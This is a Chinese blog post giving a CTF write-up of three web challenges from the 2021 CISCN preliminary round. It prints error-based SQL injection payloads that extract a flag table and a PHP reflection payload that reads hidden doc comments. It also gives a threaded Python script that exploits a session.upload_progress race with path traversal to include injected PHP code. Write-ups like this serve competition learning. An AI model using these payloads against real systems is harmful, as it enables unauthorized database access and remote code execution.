<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="国赛线上初赛writeup"><meta name="keywords" content=""><meta name="author" content="YTsang"><meta name="copyright" content="YTsang"><title>国赛线上初赛writeup | Y. blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Y. blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#web"><span class="toc-number">1.</span> <span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-sql"><span class="toc-number">1.1.</span> <span class="toc-text">easy_sql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-source"><span class="toc-number">1.2.</span> <span class="toc-text">easy_source</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#middle-source"><span class="toc-number">1.3.</span> <span class="toc-text">middle_source</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://note.youdao.com/yws/api/personal/file/WEB4d4bfca5baf6c87d4aa15350aa33e8a7?method=download&amp;shareKey=fec53138a84367efadb03ddfa08bcb24"></div><div class="author-info__name text-center">YTsang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">20</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Y. blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right"></span></div><div id="post-info"><div id="post-title">国赛线上初赛writeup</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-05-17</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>菜鸡划水，记录一下部分题目，其余的慢慢补充</p>
<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="easy-sql"><a href="#easy-sql" class="headerlink" title="easy_sql"></a>easy_sql</h2><ul>
<li><p>试了一下报错注入，过滤information和其他表，有flag表，无列名注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname&#x3D;admin&amp;passwd&#x3D;admin&#39;) or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id))c),0x7e),1)) #&amp;Submit&#x3D;%E7%99%BB%E5%BD%95</span><br></pre></td></tr></table></figure>
</li>
<li><p>注出字段id和no，注出flag表名20a14115-37f4-4396-aaac-c62aefe1cfb8</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname&#x3D;admin&amp;passwd&#x3D;123&#39;) or (updatexml(1,concat(0x7e,(select * from(select * from flag a join (select * from flag)b using(id,no))c),0x7e),1)) #&amp;Submit&#x3D;%E7%99%BB%E5%BD%95</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB79b574a38e4825bf3c02260811474749?method=download&shareKey=21ad6ca8951c8979e303a24b5b4675a3"></p>
</li>
<li><p>读flag  CISCN{IIm0Q-dxnht-HYxAk-x4NZU-xdiGF-}</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">uname&#x3D;admin&amp;passwd&#x3D;123&#39;) or (updatexml(1,concat(0x7e,mid((select group_concat(&#96;20a14115-37f4-</span><br><span class="line">4396-aaac-c62aefe1cfb8&#96;) from flag),25,16),0x7e),1)) #&amp;Submit&#x3D;%E7%99%BB%E5%BD%95</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB0c868cd71c40d26f28521cb7d4538777?method=download&shareKey=9da7dd112430f6ed7a39d7da2369a20c"></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB57a9c9b8eb94d8f510c154f84a613187?method=download&shareKey=7686b585f92f8fee60fe19218af677f7"></p>
</li>
</ul>
<h2 id="easy-source"><a href="#easy-source" class="headerlink" title="easy_source"></a>easy_source</h2><ul>
<li><p>备份文件.index.php.swo，得到源码。  </p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBaf78f9fcce3541a7c4cf3e5ecf9d7df1?method=download&shareKey=0d4905b43fd1884c82ef657868fb092d"></p>
</li>
<li><p>题目提醒flag在看不见的地方，猜测在注释，考虑用php内置类来读类中函数的注释，通过<code>getDocComment()</code>方法获取注释，本地测试可行。</p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB34443f0748607776eb3c8353b948fa9e?method=download&shareKey=7286e6c622dcf8d5fc361a01aba67f11"></p>
</li>
<li><p>用burpsuite爆破，flag在函数q的注释里 </p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?rc&#x3D;ReflectionMethod&amp;ra&#x3D;User&amp;rb&#x3D;q&amp;rd&#x3D;getDocComment</span><br></pre></td></tr></table></figure>

<p><img src="https://note.youdao.com/yws/api/personal/file/WEB12afe88996aa909a8c5ce4588125ff7f?method=download&shareKey=7eb0d30d5f34d2b45a22e583473bf1f1"></p>
</li>
</ul>
<h2 id="middle-source"><a href="#middle-source" class="headerlink" title="middle_source"></a>middle_source</h2><ul>
<li><p>扫目录，扫出.listing，提示you_can_seeeeeeee_me.php,打开是phpinfo，session有可以利用的点。  </p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB96fe2720637dc08c1c78501d5289b923?method=download&shareKey=aff2ecf5dcd0b91ccb05302e55934be8"></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBf0a8cd7ec96045bafc50cafff4b9847b?method=download&shareKey=8321c53e740f2b9a82d41e01e4d1539e"></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEBaade31e0e6260dd57542d68ed2834365?method=download&shareKey=2bdc7d2391f1a145a9be90d015be5ce2"></p>
</li>
<li><p>利用session.upload_progress进行文件包含，网上找脚本改了直接用，提示flag在<code>/etc</code>里，遍历发现疑似文件，五层套娃后有个fl444444g文件。  </p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB6fc821eb55319c69c9ea4b8a4ed7902a?method=download&shareKey=f11fcd3febd5926952e2f08b7afa1b33"></p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB1f362c387f2df8442d281cdb89ad5d4d?method=download&shareKey=e6a31d097fdfdd469492d5b09b10a001"></p>
</li>
<li><p>直接读fl444444g文件，拿到flag。  </p>
<p><img src="https://note.youdao.com/yws/api/personal/file/WEB466ec70dc473a62890dd006816ce961c?method=download&shareKey=2221ce4b1bb63fcb4ab4798fb8d92f3d"></p>
</li>
<li><p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line">sessid = <span class="string">&#x27;ctf&#x27;</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">session</span>):</span></span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">  f = io.BytesIO(<span class="string">b&#x27;a&#x27;</span> * <span class="number">1024</span> * <span class="number">50</span>)</span><br><span class="line">  resp = session.post(<span class="string">&#x27;http://124.71.239.218:24412/&#x27;</span>, data=&#123;<span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">&#x27;&lt;?php var_dump(readfile(&quot;/etc/eieeghdcda/adbababjaa/dcbbhjidfa/dbjbeiffaj/abhecdbhbc/fl444444g&quot;));?&gt;&#x27;</span>&#125;, files=&#123;<span class="string">&#x27;file&#x27;</span>: (<span class="string">&#x27;ctf.txt&#x27;</span>,f)&#125;, cookies=&#123;<span class="string">&#x27;PHPSESSID&#x27;</span>: sessid&#125; )</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">session</span>):</span></span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">  data=&#123;</span><br><span class="line">  <span class="string">&#x27;filed&#x27;</span>:<span class="string">&#x27;&#x27;</span>,</span><br><span class="line">  <span class="string">&#x27;cf&#x27;</span>:<span class="string">&#x27;../../../../../../var/lib/php/sessions/hdahbcchac/sess_&#x27;</span>+sessid</span><br><span class="line">  &#125;</span><br><span class="line">  resp = session.post(<span class="string">&#x27;http://124.71.239.218:24412/index.php&#x27;</span>,data=data)</span><br><span class="line">  <span class="keyword">if</span> <span class="string">&#x27;ctf.txt&#x27;</span> <span class="keyword">in</span> resp.text:</span><br><span class="line">   print(resp.text)</span><br><span class="line">   event.clear()</span><br><span class="line">  <span class="keyword">else</span>:</span><br><span class="line">   print(<span class="string">&quot;[+++++++++++++]retry&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line"> event=threading.Event()</span><br><span class="line"> <span class="keyword">with</span> requests.session() <span class="keyword">as</span> session:</span><br><span class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">30</span>): </span><br><span class="line">   threading.Thread(target=write,args=(session,)).start()</span><br><span class="line">  <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">   threading.Thread(target=read,args=(session,)).start()</span><br><span class="line"> event.set()</span><br></pre></td></tr></table></figure>

</li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">YTsang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2021/05/17/国赛writeup/">http://example.com/2021/05/17/国赛writeup/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com">Y. blog</a>！</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="next-post pull-right"><a href="/2021/05/08/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%9C%A8ctf%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/"><span>PHP伪协议在ctf中的应用</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://file.51ppt.vip/2020/2-8/192744-1521977264b903.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By YTsang</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>